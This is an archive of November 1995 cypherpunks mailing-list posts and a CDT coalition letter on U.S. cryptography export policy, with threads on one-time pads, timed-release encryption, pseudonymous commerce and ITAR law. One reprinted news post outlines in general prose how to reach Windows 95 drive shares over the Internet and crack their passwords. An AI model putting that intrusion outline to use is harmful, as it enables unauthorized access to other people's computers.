-----------------------------------------------------------------------

(2) Text of CDT-led Coalition Letter to Vice President Gore


November 8, 1995

The Honorable Albert Gore, Jr.
Office of the Vice President
Old Executive Office Building, Room 276
Washington, D.C. 20501

Dear Mr. Vice President:

A secure, private, and trusted Global Information Infrastructure (GII) is
essential to promote economic growth and meet the needs of the Information
Age society.  Competitive businesses need cryptography to protect
proprietary information as it flows across increasingly vulnerable global
networks. Individuals require privacy protection in order to build the
confidence necessary to use the GII for personal and financial
transactions.  Promoting the development of the GII and meeting the needs
of the Information Age will require strong, flexible, widely-available
cryptography.  The undersigned groups recognize that the Administration's
recently articulated cryptography initiative was a serious attempt to meet
some of these challenges, but the proposed initiative is no substitute for
a comprehensive national cryptography policy.  To the extent that the
current policy becomes a substitute for a more comprehensive policy, the
initiative actually risks hindering the development of a secure and trusted
GII.

A number of the undersigned organizations have already written to express
concern about the latest Administration cryptography initiative. As some of
us have noted, the Administration's proposed export criteria will not allow
users to choose the encryption systems that best suit their security
requirements.  Government ceilings on key lengths will not provide an
adequate level of security for many applications, particularly as advances
in computing render current cryptography systems less secure.   Competitive
international users are steadily adopting stronger foreign encryption in
their products and will be unlikely to embrace U.S. restrictions.  As they
stand, current export restrictions place U.S. hardware manufacturers,
software developers, and computer users at a competitive disadvantage,
seriously hinder international interoperability, and threaten the
strategically important U.S. communications and computer hardware and
software industries. Moreover, the Administration policy does not spell out
any of the privacy safeguards essential to protect individual liberties and
to build the necessary public trust in the GII.

The current policy directive also does not address the need for immediate
liberalization of current export restrictions. Such liberalization is vital
to enable U.S. companies to export state-of-the-art software products
during the potentially lengthy process of developing and adopting a
comprehensive national cryptography policy. Without relief, industry and
individuals alike are faced with an unworkable limit on the level of
security available and remain hamstrung by restrictions that will not be
viable in the domestic and international marketplace.

Many members of the undersigned groups have been working actively with the
Administration on a variety of particular applications, products, and
programs promoting information security.  All of us are united, however, by
the concern that the current network and information services environment
is not as secure as it should be, and that the current policy direction
will delay the secure, private, and trusted environment that is sought.

Despite the difficulties of balancing the competing interests involved, the
undersigned companies, trade associations, and privacy organizations are
commencing a process of collective fact-finding and policy deliberation,
aimed at building consensus around a more comprehensive cryptography policy
framework that meets the following criteria:

* ROBUST SECURITY:  access to levels of encryption sufficient to address
  domestic and international security threats, especially as advances in
  computing power make currently deployed cryptography systems less
  secure.

* INTERNATIONAL INTEROPERABILITY:  the ability to securely interact
  worldwide.

* VOLUNTARY USE: freedom for users to choose encryption solutions,
  developed in the marketplace, that meet their particular needs.

* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to
  meet the expressed needs of cryptography users.

* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth
  Amendment privacy protection and regulation of searches, seizures, and
  interceptions.

* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national
  security, while recognizing the reality that determined criminals will
  have access to virtually unbreakable encryption.

In six months, we plan to present our initial report to the Administration,
the Congress, and the public in the hopes that it will form the basis for a
more comprehensive, long-term approach to cryptography on the GII. We look
forward to working with the Administration on this matter.

Sincerely,

American Electronics Association
America Online, Inc.
Apple Computer, Inc.
AT&T
Business Software Alliance
Center for Democracy & Technology
Center for National Security Studies
Commercial Internet eXchange Association
CompuServe, Inc.
Computer & Communications Industry Association
Computing Technology Industry Association
Crest Industries, Inc.
Dun & Bradstreet
Eastman Kodak Company
Electronic Frontier Foundation
Electronic Messaging Association
EliaShim Microcomputers, Inc.
Formation, Inc.
Institute for Electrical and Electronic Engineers - United States Activities
Information Industry Association
Information Technology Industry Council
Information Technology Association of America
Lotus Development Corporation
MCI
Microsoft Corporation
Novell, Inc.
OKIDATA Corporation
Oracle Corporation
Securities Industry Association
Software Industry Council
Software Publishers Association
Software Security, Inc.
Summa Four, Inc.
Sybase, Inc.
Tandem Computers, Inc.
Telecommunications Industry Association
ViON Corporation

---------------------------------------------------------------------------

(3) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

SUBSCRIPTION INFORMAITON

1. SUBSCRIBING TO THE LIST

To subscibe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo@cdt.org" with the following command
in the body of your email message:

    unsubscribe policy-posts youremail@local.host (your name)

(leave the subject line blank)

You can also visit our subscription web page URL:http://www.cdt.org/join.html

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance constitutional civil liberties
and democratic values in new computer and communications technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1001 G Street NW * Suite 500 East * Washington, DC 20001
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post No. 29                                        11/9/95
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Thu, 9 Nov 1995 10:31:08 +0800
To: John Curtis <jbell@capecod.net>
Subject: RE: using pgp to make an otp
Message-ID: <01HXEVB6V1QQ91YN41@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

From: John Curtis              \ Internet:    (jbell@capecod.net)
To:   amp                      \ Internet:    (alan.pugh@internetmci.com)

Subject: RE: using pgp to make an otp

JC> I was confused and answered a question you didn't ask. I guess you
JC> can use PGP to generate a set of pseudorandom numbers.  I'm not sure
JC> that this would be different from  using the IDEA cypher (the
JC> underlying PGP cypher) to generate random numbers.  I am also not
JC> convinced that this would be quicker or cheaper than any number of
JC> other mechanisms.

JC> If I really wanted a true one-time pad, I'm inclined to explore the
JC> thermal noise of a zener diode.

isn't the noise generated by such a diode more accurately described
as chaotic rather than random? i would think that there might be
potential problems with using chaos as a random number source. it
might be somewhat less random than you may think as most chaotic
system's 'noise' operates within definable parameters. (like a lorenz
system). i _would_ think that it would act as a most excellent prng,
but exactly how _truely_ random it actually would be i couldn't say. 
while it may not be _truely_ random, it would most likely be
cryptographically secure though. 

i think generating _true_ randomness is pretty difficult without
measuring something similar to radioactive decay. 

the system that i proposed setting up is, admittedly, a p-otp at
best. i'm much more convinced of this than i was when i initially
proposed it. the comments i've gotten on it were most enlightening.

amp
<0003701548@mcimail.com> (since 10/31/88)
<alan.pugh@internetmci.com>
PGP Key = 57957C9D
PGP FP = FA 02 84 7D 82 57 78 E4  E2 1C 7B 88 62 A6 F9 F7 
November 9, 1995   11:41
 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMKIvRIdTfgZXlXydAQG0zAf/Y0qX8X6mFa932Egm0PdBZr4RCBHqPccx
5Nb5KZi1jQPRFnoAoEgU6Z6P+SLWCGhZisn1UxvlD2eX6HbbPB/B0mHReoWw/qp2
hI7rWCn+JtSwUvxeno88zFmZ/AreAukm8LNi/PdJp+5lunDgclrOWoR5BklglqT8
iE2nxd6dhbUEKUYXzsN6yEXDRl/tUDiriEVev2YhttTZuyUg9krMa32VtyxyUCeB
UfhidSjgwkNkSO3QQaHVHUCby8NHQJPRdKR4ym8tDfFjNXxieUQKwxi8r/0ofo5g
1UxtBwJICd+/LxOZovtKGYDqHJc4vPRqdY7x4VbTff0FM4i4W0ZpUQ==
=6ty1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Fri, 10 Nov 1995 11:06:59 +0800
To: cypherpunks@toad.com
Subject: Meteors [NOISE]
Message-ID: <199511100156.UAA35213@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My car window was taken out 5 years ago in Saint Petersburg, FL by a golf-ball sized meteorite during the Pleaides Meteor Shower. I still
have the rock, and the glass cost me $100 (the insurance deductable).
Happily, I wasn't in my car at the time, but I no longer think of
meteor damage as a rare event. I've come to believe that Republicans
could be right, for the wrong reason, about SDI. As a Libertarian,
I find the problem of planetary meteor defense/avoidance troubling.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMKKpjG1lp8bpvW01AQFmyQQAkjJXRNhhJtIKEDmxy3tGjy0TiJXpJIw6
MxujSnWgT5N2x+DBEkuVOfJrkqIXDsoO2lqR6SbYOb8NvtB5HdqQkU0sKNwxWe5Y
IN6LXKPbfQgfOVETFdRhtgRaYyyaGgdD9++U6wOwl6D5rsRnBcvPWXwzpAKmIC13
iAR0yPNCDNE=
=f160
-----END PGP SIGNATURE-----
Regards, Jim Ray

"When I visit Congress, I feel like Tom Paine in the Court of King George."
John Perry Barlow 

Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty@gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Mon, 13 Nov 1995 16:59:37 +0800
To: cypherpunks@toad.com
Subject: Vannevar Bush, Ultra, and the Other Memex
Message-ID: <v01530502acc885a0a819@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



I borrowed an interesting book from the library a while ago: _Information
and Secrecy. Vannevar Bush, Ultra, and the Other Memex_. If this is old
hat, please ignore.

It covers the history of computing and comparing machines from the early
1900's to about 1950 -- devices employing photocells, relays, gas-filled
tubes, microfilm, punched optical tape, mechanical integrators, etc. There
is a fair amount of crypto relevance as it passes through WWII and the
cracking of cyphers becomes important. It's also a tale of overly-ambitious
projects that rarely worked, beaurocratic bumbling, influence, and
ignorance.

_Information and Secrecy. Vannevar Bush, Ultra, and the Other Memex_.
Colin Burke
The Scarecrow Press Inc.
1994
ISBN 0-8108-2783-2


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 10 Nov 1995 15:56:19 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
Message-ID: <199511100540.VAA26681@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:58 AM 11/9/95 -0500, "Beavis B. Thoopit" <beavis@bioanalytical.com> wrote:
>I have not yet convinced myself that a time-release information device
>is impossible....

Actually, if you don't mind only getting 3 seconds into the future,
moon-bounce is fairly simple and hard to tap on the uplink.
Unfortunately, most objects sufficiently far away to use this sort
of technique for practical applications are too small or distant to be 
good bounce targets, and some, like the Sun, are just not real cooperative.
For more expensive techniques, you could always launch a spaceship into a
cometary orbit, figuring out how long it'll take to come back.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Mon, 13 Nov 1995 18:20:50 +0800
To: cypherpunks@toad.com
Subject: technical and social structures in the pseudonymous economy
Message-ID: <199511100450.VAA26914@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

When a person does business pseudonymously (where I consider
pseudonymity to be == anonymity & non-repudiation & two-way
communication (where non-repudation presupposes some sort of
identifier of the actor)) then that person is exempt (for the most
part) from the threat of physical retribution, the force of law,
etc.  Thus in order to be trusted with some valuable information
such as money this person needs to offer up some collateral which
can be debitted in the case that they violate their contract.  Of 
course this raises the question of who holds the collateral, and it is
a big open spot where statists might jump in with their tired old 
rhetoric (as soon as they clue in to what's going on here), but 
I sincerely hope that a highly redundant, interdependent, robust set 
of private "lien, escrow and arbitration" agencies take up the job.


As a simple example, pseudonymous E-bank customers can be required to 
keep positive balances in their accounts, and in the case that they
are caught trying to double-spend or commit other fraud, a fine can be
withdrawn from this account by the bank.  This model can be applied to
any pseudonymous transaction or contract.  It is important to note 
that this technique does *not* eliminate the risk of fraud--  it 
reduces the likelihood that the pseudonymous customer can commit fraud
successfully and it *increases* the likelihood that the bank can do
so.


Of course this is not necessary if we are not giving the pseudonym any
opportunity to cheat us (because we are using all on-line clearing 
etc.) but for most (I think) applications it is necessary to extend to
the pseudonym some amount of trust, in the form of a "loan" or other 
credit, or, in the form of other digital credentials, access to 
information etc. etc.


I consider this to be a very important idea for the development of
the cyberspace economy/community/libertaria and as I mentioned it
is a point where it would be more easy for the statists to attempt 
an inroad into said community.


I envision a situation in which a pseudonym cannot cheat anyone out
of more money than he has already put up as collateral on his
contract.  Thus mere cyber-fraud is never profitable.  Instead, the 
only way to cheat people is to subvert the escrow&arbitration agencies
into ruling unfairly in your favor, allowing you to abscond with your 
collateral and so forth.  This, unfortunately, moves the whole mess of
"law and society" from the elegant cryptographic solutions that we all
love back into the realm of politics, social ideology and so forth, 
but I think we are in a better position to insure fair dealings now
that we have these cryptographic capabilities like non-repudiation
& privacy, and the currency & transaction protocols which follow
from them.


Note that because the escrow&arbitration agencies are likely to be 
large, redundant and interdependent a petty criminal will not have 
much chance of subverting them, but a major one-time heist is 
theoretically effective, as is the organized, large-scale extortion 
which does not heist it all at once but which instead siphons off an
extortion (tax) payment at regular intervals.  (Note strong 
resemblance between this last criminal strategy and the behavior of 
most governments.)


Of course I'm not the first to think about these kinds of things.
 Nick Szabo 
(szabo@netcom.com) in particular has thought a lot about making the 
escrow&arbitration process mathematically deterministic, when he talks
about his "liens" and "smart contracts", but my intuition is that the 
domain of contracts which are amenable to mathematically-controlled
escrow&arbitration is much smaller than the domain of contracts which 
need a trusted intelligence to do the escrow&arbitration.  (Nick also 
discusses the trusted-intelligence issues, such as using n-of-m key 
splitting to distribute the arbitration power.)


In summary:  lien, escrow and arbitration agencies, which are endowed
by the principals with the authority to adjudicate fraud cases, and 
which are entrusted by the principals with the electronic cash, crypto
keys, and so forth to enforce their decisions, will be essential to 
the operation of the pseudonymous economy.  These agencies will
themselves be the targets and/or the perpetrators of theft, however.
Concerned citizens of the world need to start thinking about how to
minimize these risks.  Factors to consider include:  The relatively
low start-up costs of such agencies, the role of governments, mafia, 
or other force-wielding organizations, and "the problem of 
pseudonymity" (can't tell if two pseudonyms are under same True 
Person's control) possibly leading to a single organization 
controlling a large enough share of escrow&arbitration services that 
it can initiate heists or extortion.


I'll be trying to write these ideas of mine into a set of HTML
documents for display on my web pages.  I appreciate all
constructive correspondance.


(P.S.  Of course a pseudonym's reputation may be considered by some
to be valuable enough to use as this "collateral" or "lien".   
It wouldn't be so considered by me.  I'd take cash.)


Regards,

Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKLZp/WZSllhfG25AQH/UQQAuGGRVjQBqpzY3+3ndpTdipFYkEIiRkaF
c+6+FbdsUokCqcbSkTS1Dc/vOt3FRgtScvW9fvbMj0S5oqaLzvrHebLYASgeoihx
AezLI0q8Cf2yKCYC4+e5bq/QPB78ZVsEGnnEDxIedRiLIFz72hCmCi9t+ybCYB9r
yaRjAyNiAxg=
=fGb2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@clark.net
Date: Fri, 10 Nov 1995 12:00:23 +0800
To: cypherpunks@toad.com
Subject: Cryptographic Random Numbers
Message-ID: <199511100310.WAA06420@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm working on an appendix to the P1363 Public Key Standard draft covering
sources for and handling of cryptographic random numbers.  I've got a draft
on which I'd appreciate comments.  It's available as a web page:

	http://www.clark.net/pub/cme/CRN.html

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
Date: Fri, 10 Nov 1995 12:40:50 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <acc7a170020210041a84@[205.199.118.202]>
Message-ID: <199511100331.WAA02410@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May responded:
> The tamper-proof (more correctly, "tamper-resistant" or
> "tamper-responding") hardware is so that attackers do not alter the clocks,
> as one example, to "speed up" the time release. Or grab the key, as another
> example.
>
> (Cranking up the clock speed may or may not be possible and still have the
> device work, but it's still an attack to consider.)
> 
> If the attacker can grab the internal state of the device, he can of course
> run the "transform" talked about above on his equipment.
> 
> >If the transform exists, it will ease/eliminate the reliance on the
> >"economics" of cryptography to build a tamper-proof physical device.
> 
> You'll need to more carefully argue your thesis. I cannot imagine a method,
> save perhaps for quantum computing techniques, which can avoid the need for
> "secure secrets," either via a person keeping a secret or a box keeping a
> secret.

Above, I said "ease/eliminate"... let me limit my claim to "ease".

I see 2 unique points in this scheme that I have not seen discussed
much:  1) Using _dynamics_ to _limit_ (maybe not prevent) penetration
of a system.  2) Using a feedback state machine in a heavily iterative
manner to hide the message.

The tamper-resistant circuits discussed (and some enjoying some
hopefully profitable sales) have been _static_.  There is no (of which
I am aware) continual change in the circuit/mechanism.  I propose a
device in some form of incessant motion (electrical or otherwise).
It seems a greater (thought I am sure not impossible) task to capture
the state of a moving target.  It seems that there may be a device
that inherently allows itself to be read serially (one bit after
another).

Add the feedback state machine to this (ephemeral) device, and you
may have a nice platform for time-released information.

The torsion-wire device described in a previous post is a nice example
of a device that allows access to only one bit at a time.  (Now, maybe
some sort of camera could be used to "see" all of the bits at once in
flight along the wire.  For argument, let's assume not.)  The problem
with the torsion wire device is that the math transform needs to live
somewhere between the two ends; access to the bits at the front and
back of the transform is not allowed.

I want something cheaper than a satellite, but beaming bits to a
satellite that performs the iterative, feedback transform and transmits
the transformed bits back home may
illustrate the type of platform needed.  It allows me to see only
one bit at a time.  The bits are munched each "round".  A delay is
inherent in the system and is not "acceleratable".

If this platform exists, how do I precompute a message to take
advantage of it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Fri, 10 Nov 1995 17:51:46 +0800
To: cypherpunks@toad.com
Subject: Above The "Minimum"
Message-ID: <Pine.BSD.3.91.951110042709.16321A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 

Friend,


The following excerpt is reposted by permission of editor@cdt.org
(cdt = Center for Democracy and Technology).


CDT POLICY POST Number 28                      November 6, 1995

CONTENTS: (1) Senator Leahy Calls on FBI to Justify Surveillance Capacity
              Request
          (2) Text of Senator Leahy's Letter to FBI Director Freeh
          (3) Review of Digital Telephony Implementation to Date
          (4) How To Subscribe To The CDT Policy Post Distribution List
          (5) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor@cdt.org)

[snip]

(3) REVIEW OF DIGITAL TELEPHONY PROCESS TO DATE

[snip]

* DIRECT NEGOTIATIONS WITH TELECOMMUNICATIONS CARRIERS FOR
SURVEILLANCE
  CAPACITY ABOVE THE NATIONAL MINIMUM?

The FBI has proposed to undertake direct negotiations with
telecommunications carriers for surveillance capacity beyond the proposed
national minimum standard requested in the notice.

When Congress passed CALEA last year, it created a public process to bring
law enforcement's electronic surveillance ability under public scrutiny in
order to balance the new authority to influence the design of
telecommunications networks.

The public accountability provisions of CALEA require the FBI to publish
*all* surveillance capacity requests.  Congress must take a critical look
at this aspect of the FBI's proposal, and should not appropriate funds
until the FBI agrees to disclose all capacity requests, as required by the
law.

[snip]

To subscibe to the policy post distribution list, send mail to
"Majordomo@cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


                               ----


Cordially,

Jim









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 13 Nov 1995 09:28:09 +0800
To: cypherpunks@toad.com
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
Message-ID: <199511111547.HAA08706@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:15 PM 11/8/95 -0500, ACLUNATL@aol.com wrote:
> According to the government's own statistics, 1,800 innocent conversations
> are intercepted each and every time a wiretap or other form of electronic
> surveillance is placed.

This seems curiously inefficient, even for government work.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 13 Nov 1995 13:31:36 +0800
To: cypherpunks@toad.com
Subject: YOU_luz
Message-ID: <199511101431.JAA26270@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A gruel of high-tech privacy ghoulisms:

   Nov 4 Economist on burgeoning health services by "outsiders"
   like defense firms in which lucrative data banks on 
patients'
   rotting carcasses are abuilding for resale.

   Nov 9 W$J on a conference tut-tutting data banking of
   citizens' repulsive life styles.

   Nov 9 Financial Times on British Gov smarmily smart
   "transaction cards" banking citizens' pathetic fears.


   YOU_luz  (19 kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 10 Nov 1995 23:21:59 +0800
To: beavis@bioanalytical.com
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <199511092232.OAA08016@comsec.com>
Message-ID: <9511101445.AA26394@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>From: "Beavis B. Thoopit" <beavis@bioanalytical.com>
>Date: Thu, 9 Nov 1995 10:58:03 -0500 (EST)

>I have not yet convinced myself that a time-release information device
>is impossible....
>
>Does there exist a storage device that, due to _dynamics_ (or other
>factor), prevents the total contents being read in one instance?
>
>Bubble memory device?  Torsion wire memory device?


The only one I've been able to think of (from this thread on sci.crypt
several years ago) was a message, e.g., PGP encrypted with two different
public keys K1 and K2:

	E(K1, E(K2, E(K1, E(K2, ..., E(K1, X)...))))

with private key 1 here on Earth and private key 2 a reasonable distance
away -- e.g., Mars.

The time it takes to decrypt this *can* be lower-bounded, assuming the
private keys remain secret.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKNleVQXJENzYr45AQH9VQP/ddsthyo+HERj85a9vjAVVfQN/37wTZae
oz0qlT3iQbdTWeYlTuCjWdpfknZBqrfb3JkiUI1wGuCc7d5UZc9rCm5aB0kRL83q
IpSx5KQTaELQDULwaHcdPjbGIkCdvtpjQPHumm1lFy1XgM2zo+LbEoiyvlld6d+W
pxSIppefmvA=
=Bcs+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Fri, 10 Nov 1995 18:18:48 +0800
To: cypherpunks@toad.com
Subject: Win95 A Hacker's Net Dream
Message-ID: <199511101057.KAA01104@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


Windows 95 Is A Hacker's Dream Over The Internet


Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined
with the Internet, could be a dream made in hacker
heaven. From seasoned propeller heads Newsbytes has
contacted, it looks like Windows 95 could be more of
a security nightmare than was first thought.

This is especially true where fixed link companies are
concerned. An investigation of the new operating system,
when hooked onto the Internet, leaves computers wide
open. Executing a series of simple, uncomplicated
commands opens up company and private users' computers to
hacking the moment they access the Internet, claim some
analysts.

Worse, they may never know it has been done. Using a
simple Unix command, a hacker can locate the IP (Internet
protocol) address of the subscriber logged into an
Internet service provider. Then he needs only one more
thing; a logged-on Internet user using Microsoft's new
operating system.

For businesses with leased line Internet links, it can
happen at any time, day or night. Once the IP address has
been noted, the hacker simply creates a file through DOS
on his own system, specifying the address and naming it.
Using two other commands -- which purge the remote names
on the IP, or Internet provider's port -- the system then
refreshes and remaps itself in preparation to be accessed
by the hacker's computer.

Because Windows 95 is designed with a networking
capability, it leaves all computers in the office open to
illegal access. Once the hacker has called up his Map
Network Drive, the hard disk on his own machine cannot be
differentiated from that of the genuine user. All that
need be done then is to put in a common drive name, most
obviously "C:\." For networked machines, the default "C$"
is common.

This gives access to all files on the subscriber's drive.
While Windows 95 allows the user to protect the drive by
giving it a password, computer experts Newsbytes talked
to said that device won't necessarily lock out intruders.
Because the operating system has no "audit" trail -- in
other words, it does not log who or how someone is
accessing the drive -- a hacker can spend weeks trying to
discover the password. Password search programs, like
Cracker, are readily available and can break through most
simple password sequences.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 11 Nov 1995 00:47:04 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <m0tDvw0-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



I did say that I would discuss the apparent disagreement between Mr.
Froomkin and myself on the issue of the seperation of powers and the
validity of the ITAR.  But, since I think that we were rather at
cross-purposes and not in any real disagreement--and since the subject
is a fair distance from the core concerns of this list--I will keep
this response short.  

The first place where Mr. Froomkin and I got at cross-purposes was
when I said:

  I would admit that a court might do this in an effort to hold the
  statute constitutional, but a court might also hold the regulations
  unconstitutional because they are overbroad.

And Mr. Froomkin replied:

  Technically, this is holding the regulations ultra vires, not
  unconsitutional; the difference matters.

which, at first, rather confused me, until I realized that in my haste
I had been assuming--since I automatically think of constitutional
challenges to the ITAR in terms of the first amendment--that the
``unconstitutionality'' in question was that of violating the first
amendment and was applying the first amendment doctrine of
``overbreadth'' to a constitutional challenge that might have been
based on some other ground, like ``lack of jurisdiction'', and yet Mr.
Froomkin's response seemed to relate to my separation of powers
argument, which can, of course, be quite properly be called an ``ultra
vires'' argument.

I think that it was my failure to keep the different strands of my
various arguments separate that is responsible for our apparent
disagreement here, and for that I apologize.

But I do think that Mr. Froomkin is wrong in claiming that holding the
regulations ultra vires is not the same as holding them
unconstitutional.  (I agree, however, that if one were to challenge
the regulations in a proceeding in the nature of quo warranto brought
under the Administrative Procedure Act, one would probably not talk
about the regulations being ``unconstitutional''; on the other hand, I
also have my doubts about whether one would use the phrase ``ultra
vires'' in such a proceeding.)  When a defendant in a criminal case
raises the defense that the regulations he is charged with violating
are ``ultra vires'' because Congress did not authorize them, that most
certainly is a constitutional issue, involving the supremacy clause,
the due process clause, the ninth-amendment, and the doctrine of
separation of powers.

But perhaps I still misunderstand what argument of mine--or that I
appeared to make--was the one to which Mr. Froomkin attached the
``ultra vires'' label.  

In any case, I want to thank him for doing so, because it brought home
to me the important fact that it is possible that the ITAR provisions
relating to cryptographic software could be struck down, not because
they violate the first amendment, or would violate it if passed by
congress, and not because the court is trying to dodge the difficult
first amendment issue, but simply because the provisions are not
authorized by any legislation.

In any case, my separation of powers argument appears in Junger, Down
Memory Lane: The Case of the Pentagon Papers, 23 CWRU L. Rev. 3
(1971).

After counting noses in the Pentagon Papers case I concluded that the
the only position that arguably was agreed to by a majority of the
justices in the case was that the injunction that the government
sought was not authorized by Congress, and that therefore the
government was not entitled to the relief that it sought.  And I
suggested that this meant that the court never determined whether
Congress could have passed a valid law authorizing the ``prior
restraint'' in such a case.  And finally I suggested that that was not
a bad way of avoiding a difficult constitutional question under the
first amendment.  (Or at least that is a thumb-nail sketch of how I read
the article now.)

With this explanation, I don't know whether Mr. Froomkin would persist
in his statement that:

  It's too far off topic to pursue any further, but I must take
  exception to the suggestion that we are well served by separation of
  powers intruding into other legal domains.  Bowsher tells us that
  causation principles go out the window in SOP cases.  That alone
  makes it radioactive.

I must admit that I don't know what it is that he is refering to.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




